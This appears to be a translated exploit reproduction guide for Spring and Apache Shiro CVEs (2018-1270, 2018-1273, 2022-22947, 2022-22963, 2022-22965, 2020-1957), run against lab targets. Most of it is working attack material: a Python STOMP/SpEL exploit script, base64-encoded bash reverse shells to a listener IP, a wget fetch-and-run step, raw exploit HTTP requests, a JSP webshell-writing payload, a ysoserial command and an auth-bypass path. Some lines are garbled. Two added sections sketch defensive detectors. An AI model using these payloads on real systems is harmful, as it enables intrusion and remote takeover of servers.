Reverse shell: bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ4LjE0NC82NjY1IDA+JjE=}|{base64,-d}|{bash,-i} , whose byte form is 98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,120,79,84,73,117,77,84,89,52,76,106,81,52,76,106,69,48,78,67,56,50,78,106,89,49,73,68,65,43,74,106,69,61,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125 . Remember to set Content-Type: application/json-patch+json. The reverse shell connects.
Spring CVE-2018-1270

Affected versions: Spring Framework 5.0 to 5.0.4, Spring Framework 4.3 to 4.3.14. EXP:

```python
#!/usr/bin/env python3
import requests
import random
import string
import time
import threading
import logging
import sys
import json

logging.basicConfig(stream=sys.stdout, level=logging.INFO)


def random_str(length):
    letters = string.ascii_lowercase + string.digits
    return ''.join(random.choice(letters) for c in range(length))


class SockJS(threading.Thread):
    def __init__(self, url, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.base = f'{url}/{random.randint(0, 1000)}/{random_str(8)}'
        self.daemon = True
        self.session = requests.session()
        self.session.headers = {
            'Referer': url,
            'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'
        }
        self.t = int(time.time() * 1000)

    def run(self):
        url = f'{self.base}/htmlfile?c=_jp.vulhub'
        response = self.session.get(url, stream=True)
        for line in response.iter_lines():
            time.sleep(0.5)

    def send(self, command, headers, body=''):
        # STOMP frame: COMMAND, header lines, blank line, body, NUL terminator
        data = [command + '\n']
        data.append('\n'.join(f'{k}:{v}' for k, v in headers.items()))
        data.append('\n\n')
        data.append(body)
        data.append('\x00')
        data = json.dumps([''.join(data)])

        response = self.session.post(f'{self.base}/xhr_send?t={self.t}', data=data)
        if response.status_code != 204:
            logging.info(f"send '{command}' data error.")
        else:
            logging.info(f"send '{command}' data success.")

    def __del__(self):
        self.session.close()


sockjs = SockJS('http://你的靶机IP:8080/gs-guide-websocket')
sockjs.start()
time.sleep(1)

sockjs.send('connect', {
    'accept-version': '1.1,1.0',
    'heart-beat': '10000,10000'
})
sockjs.send('subscribe', {
    'selector': 'T(java.lang.Runtime).getRuntime().exec(new String[]{"/bin/bash","-c","exec 5/dev/tcp/你的kaliIP/kali监听端口;cat &5 >&5; done"})',
    'id': 'sub-0',
    'destination': '/topic/greetings'
})

data = json.dumps({'name': 'vulhub'})
sockjs.send('send', {
    'content-length': len(data),
    'destination': '/app/hello'
}, data)
```
The reverse shell connects.
Spring Data Commons RCE vulnerability (CVE-2018-1273)

Spring Data is an open-source framework that simplifies database access and supports cloud services; Spring Data Commons is the shared foundation of all Spring Data sub-projects. Spring Data Commons 2.0.5 and earlier contain a SpEL expression injection vulnerability: an attacker can inject a malicious SpEL expression to execute arbitrary commands. Scan with python3 SpringBoot-Scan.py -v "http://192.168.48.133:8080/" .

```http
POST /users?page=&size=5 HTTP/1.1
Host: 192.168.48.133:8080
Connection: keep-alive
Content-Length: 129
Pragma: no-cache
Cache-Control: no-cache
Origin: http://192.168.48.133:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.48.133:8080/users?page=0&size=5
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch whoami.sh")]=&password=&123repeatedPassword=123
```

For a reverse shell, serve the script with Python's http.server (python -m http.server 8888); the served script is bash -i >& /dev/tcp/192.168.48.144/6665 0>&1 . The payload is the same username[#this...exec(...)] parameter, this time with a wget command that fetches the script from the http.server. The bash reverse shell succeeded here; running the file with ./ did not.
Spring Cloud Gateway remote code execution vulnerability (CVE-2022-22947)

Vulnerability description: on 1 March 2022 VMware published a vulnerability report: applications using Spring Cloud Gateway that enable and expose the Gateway Actuator endpoint are susceptible to code injection; an attacker can craft malicious requests to achieve arbitrary remote execution on the host. Affected versions:

[*]Spring Cloud Gateway 3.1.x < 3.1.1
[*]Spring Cloud Gateway 3.0.x < 3.0.7
[*]Older, unsupported versions are also affected
python3 SpringBoot-Scan.py -v "http://192.168.48.133:8080/" https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515377.png https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515451.png
POST /actuator/gateway/routes/hacktest HTTP/1.1 Host: 192.168.48.133:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/json Content-Length: 310
{ "id": "hacktest", "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"id"}).getInputStream()))}" } }], "uri": "http://example.com" }
Then send the following request to trigger evaluation of the expression:
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515623.png
POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.48.133:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
 
GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.48.133:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Send the request above to read back the result:
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515893.png
Spring Cloud Function SpEL RCE vulnerability (CVE-2022-22963)

Vulnerability description: In March 2022 the Spring Cloud team fixed a SpEL expression injection vulnerability in Spring Cloud Function. The apply method of the RoutingFunction class evaluates the value of the "spring.cloud.function.routing-expression" request header as a SpEL expression, which results in SpEL injection; an attacker can exploit it to execute arbitrary code remotely.
Exploitation: manual reproduction
POST /functionRouter HTTP/1.1
Host: 192.168.68.168:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ4LjE0NC82NjY1IDA+JjE=}|{base64,-d}|{bash,-i}")
Content-Type: text/plain
Content-Length: 6

Test
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515059.png
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515142.png
Spring Core RCE vulnerability (CVE-2022-22965)

Vulnerability description: Spring Framework is the foundational open-source framework within Spring, intended to reduce the difficulty and shorten the development cycle of Java enterprise applications. On 31 March 2022 VMware Tanzu published a vulnerability report: Spring Framework has a remote code execution vulnerability, and Spring MVC or Spring WebFlux applications running on JDK 9+ may be vulnerable to RCE through data binding.
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515212.png
/tomcatwar.jsp?pwd=aabysszg&cmd=whoami
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515342.png
Manual reproduction:
GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: 192.168.48.133:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
suffix: %>//
c1: Runtime
c2: <%

bash -i >& /dev/tcp/192.168.48.144/6668 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ4LjE0NC82NjY4IDA+JjE=
java -jar ysoserial-all.jar CommonsBeanutils1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ4LjE0NC82NjY4IDA+JjE=}|{base64,-d}|{bash,-i}" > poc.ser
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515300.png
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515452.png
Modify the cookie and send the request.
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515617.png
Reverse shell obtained.
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515787.png
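As an added defensive example (mine, not part of the original write-up), the Python inspector below applies request-level signatures for the three Spring vulnerabilities reproduced above, CVE-2022-22947, CVE-2022-22963 and CVE-2022-22965, to constructed request records modelled on the requests shown; the record format, the `inspect_request`/`scan` names and the rule thresholds are assumptions for illustration.

```python
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed request records (not captured traffic), modelled on the requests in this write-up.
SAMPLE_REQUESTS = [
    {"method": "POST", "target": "/actuator/gateway/routes/hacktest",
     "headers": {"Content-Type": "application/json"},
     "body": '{"id":"hacktest","filters":[{"name":"AddResponseHeader",'
             '"args":{"name":"Result","value":"#{7*7}"}}],"uri":"http://example.com"}'},
    {"method": "POST", "target": "/functionRouter", "body": "Test",
     "headers": {"spring.cloud.function.routing-expression": "T(java.lang.Runtime).getRuntime()"}},
    {"method": "GET", "headers": {}, "body": "",
     "target": "/?class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp"},
    {"method": "GET", "target": "/index.html", "headers": {}, "body": ""},
]

def inspect_request(req):
    """Return the CVE ids whose request-level signature matches (empty list if none)."""
    hits = []
    parts = urlsplit(req["target"])
    path = unquote(parts.path)
    headers = {k.lower(): v for k, v in req["headers"].items()}
    body = req.get("body", "")
    # CVE-2022-22947: a route written through the Gateway actuator whose filter args carry
    # a SpEL template; route management should never be reachable from ordinary clients.
    if req["method"] == "POST" and path.startswith("/actuator/gateway/routes/") and "#{" in body:
        hits.append("CVE-2022-22947")
    # CVE-2022-22963: the routing-expression header is an internal control header; a SpEL
    # type reference T(...) arriving in it from outside is the injection signal.
    if "T(" in headers.get("spring.cloud.function.routing-expression", ""):
        hits.append("CVE-2022-22963")
    # CVE-2022-22965: the exploit binds request parameters onto class.module.classLoader.*;
    # no legitimate form field starts with that prefix.
    names = (n for n, _ in parse_qsl(parts.query, keep_blank_values=True))
    if any(n.startswith("class.module.classLoader") for n in names):
        hits.append("CVE-2022-22965")
    return hits

def scan(requests):
    """Summarise a batch as (method, path, hits) tuples, one per request."""
    return [(r["method"], urlsplit(r["target"]).path, inspect_request(r)) for r in requests]

if __name__ == "__main__":
    for method, path, hits in scan(SAMPLE_REQUESTS):
        print(f"{method:4} {path:45} {', '.join(hits) or 'no match'}")
```

The same rules translate directly into WAF or reverse-proxy conditions; the Gateway rule in particular is moot once the actuator endpoint is disabled or bound to an internal management port.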
shiro-CVE-2020-1957

Vulnerability description: When Apache Shiro is used for authentication and authorization, a carefully constructed URL can exploit the difference in how Apache Shiro and Spring Boot process URLs to bypass Shiro's access control on Spring Boot servlets, resulting in privilege escalation and unauthorized access. Affected versions:

[*]Apache Shiro < 1.5.1
Reproduction: the payload /xxx/..;/admin/ gives unauthorized access to the admin backend.
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515801.png
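The added example below (mine, not from the original post or from Shiro's code base) models the path-handling difference the description refers to: a simplified pre-1.5.1 matcher view that treats `..;` as an ordinary segment, next to the container view that strips `;` path parameters before normalizing, and a hardened check that matches the filter chain against the path the container actually dispatches. The two normalizers and the `/admin/` prefix are illustrative assumptions, not Shiro's or Tomcat's implementation.

```python
def strip_path_params(path):
    """Drop ';param' path parameters from every segment, as the servlet container does."""
    return "/".join(seg.split(";", 1)[0] for seg in path.split("/"))

def normalize(path):
    """Resolve '.' and '..' segments; a segment such as '..;' is NOT treated as '..'."""
    out = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    result = "/" + "/".join(out)
    if path.endswith("/") and result != "/":
        result += "/"
    return result

def legacy_authz_path(raw_path):
    """Model of the pre-fix matcher: normalizes without stripping path parameters."""
    return normalize(raw_path)

def container_path(raw_path):
    """Path the container dispatches to: path parameters stripped, then normalized."""
    return normalize(strip_path_params(raw_path))

def is_protected(path, prefix="/admin/"):
    """Stand-in for a filter chain rule such as /admin/** = authc."""
    return path.startswith(prefix)

def detect_bypass(raw_path, prefix="/admin/"):
    """True when authz sees an unprotected path but dispatch lands on a protected one."""
    return (not is_protected(legacy_authz_path(raw_path), prefix)
            and is_protected(container_path(raw_path), prefix))

def hardened_decision(raw_path, prefix="/admin/"):
    """Fixed behaviour: evaluate the rule against the same path the container will dispatch."""
    return is_protected(container_path(raw_path), prefix)

if __name__ == "__main__":
    for p in ("/xxx/..;/admin/", "/admin/", "/public/index"):
        print(p, "->", container_path(p), "bypass:", detect_bypass(p), "hardened:", hardened_decision(p))
```

`detect_bypass` is also usable as a log-review rule: any request where the two views disagree on protection is worth an alert regardless of the response code.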
Shiro bypass WAF

For WAF bypass, see the following article: http://120.79.21.98:8090/archives/shirobypass
Shiro: approach when the key is known but no gadget chain is available

A question encountered in interviews: besides the principle of the Shiro deserialization vulnerability, this point is sometimes asked as well. In practice gadget chains are still available; when there are many candidates, the gadget chains are brute-forced to complete exploitation.
Environment setup:
docker pull medicean/vulapps:s_shiro_1
docker run -d -p 80:8080 medicean/vulapps:s_shiro_1
https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202404081515826.png
